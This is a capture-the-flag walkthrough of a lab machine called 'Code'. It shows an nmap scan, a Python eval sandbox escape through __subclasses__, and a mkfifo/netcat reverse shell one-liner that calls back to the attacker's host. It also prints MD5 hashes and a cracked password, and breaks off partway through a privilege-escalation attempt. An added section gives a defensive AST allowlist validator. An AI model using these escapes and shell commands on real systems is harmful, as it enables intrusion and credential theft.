Code

Enumeration
Nmap
nmap -p- --open -sCV --top-ports 500 10.10.11.62
#########################################################
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA)
| 256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA)
|_ 256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519)
5000/tcp open http Gunicorn 20.0.4
|_http-title: Python Code Editor
|_http-server-header: gunicorn/20.0.4
We can see that the SSH port is open and a Gunicorn 20.0.4 web service is listening on port 5000.
Add the virtual host code.htb for this IP to /etc/hosts.
Web

A Python Code Editor... hmm.

So I tried sending a Python RCE payload from https://www.revshells.com/, but none of them worked; we need to search further.
We need to break out of the Python 3 eval protections. Before investigating further, I found this website:

Exploitation
With it we can list the subclasses available in this website's interpreter:
print([].__class__.__base__.__subclasses__())

After searching, reading and talking with ChatGPT, I found a way to get a reverse shell:
## RS
().__class__.__bases__[0].__subclasses__()[317](['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.172 1234 >/tmp/f'], shell=True)
## NC connection
nc -nlvp 1234
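The escape above works by walking from a plain literal to every loaded class through ordinary attribute access and indexing, so a protection that only watches for dangerous names misses it. As an added example (not code from the writeup or from the box), the Python validator below parses untrusted input into an AST and admits only an allowlist of node types and names, so the `__class__`/`__subclasses__` chain is rejected before anything is evaluated; the allowlist contents are my own choice for illustration.

```python
import ast
import builtins

# Added example: allowlist-based validation of an untrusted Python expression.
# Instead of blocklisting keywords, accept only known-harmless node types and
# names, and refuse attribute access entirely, which is what the
# __class__ -> __bases__ -> __subclasses__ walk relies on.

# Node types a harmless arithmetic/collection expression may contain.
ALLOWED_NODES = (
    ast.Expression, ast.BinOp, ast.UnaryOp, ast.BoolOp, ast.Compare,
    ast.Constant, ast.Name, ast.Load, ast.List, ast.Tuple, ast.Call,
    ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod, ast.Pow, ast.USub, ast.UAdd,
    ast.And, ast.Or, ast.Not, ast.Eq, ast.NotEq, ast.Lt, ast.LtE, ast.Gt, ast.GtE,
)
# The only names an expression may reference (resolved from builtins below).
ALLOWED_NAMES = {"abs", "min", "max", "len", "sum", "round"}


def check_expression(src):
    """Return (ok, reason). Anything outside the allowlist is rejected."""
    try:
        tree = ast.parse(src, mode="eval")  # statements are a SyntaxError here
    except SyntaxError as exc:
        return False, "syntax error: %s" % exc.msg
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute):
            return False, "attribute access not permitted: %s" % node.attr
        if not isinstance(node, ALLOWED_NODES):
            return False, "disallowed construct: %s" % type(node).__name__
        if isinstance(node, ast.Name) and node.id not in ALLOWED_NAMES:
            return False, "unknown name: %s" % node.id
    return True, "ok"


def safe_eval(src):
    """Evaluate src only if it passes check_expression, with builtins emptied."""
    ok, reason = check_expression(src)
    if not ok:
        raise ValueError(reason)
    env = {"__builtins__": {}}
    env.update({name: getattr(builtins, name) for name in ALLOWED_NAMES})
    # This restricts the language, not CPU or memory use; untrusted code
    # should still run in an isolated process with resource limits.
    return eval(src, env, {})
```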

User Flag
With it we can obtain the user flag in /home.

Now, inside app-production there is a folder named /app/instance, and it contains a database.db.


We can obtain two user hashes; look them up on CrackStation, for example:
martin:3de6f30c4a09c27fc71932bfc68474be
development:759b74ce43947f5f4c91aeddc3e5bad3

Both are MD5, and we can recover both passwords:
martin:nafeelswordsmaster

Root Flag
First I need to upgrade the shell to a full TTY.



We can see that the martin user can run /usr/bin/backy.sh as root; before executing, it asks us for a task.json.
I will try to modify task.json to point at the /root directory so that it backs up the whole directory.


Hmm... now let's try path traversal:

Execute it, and it fails.

We need to delete the exclude variable from the code, since it causes problems:


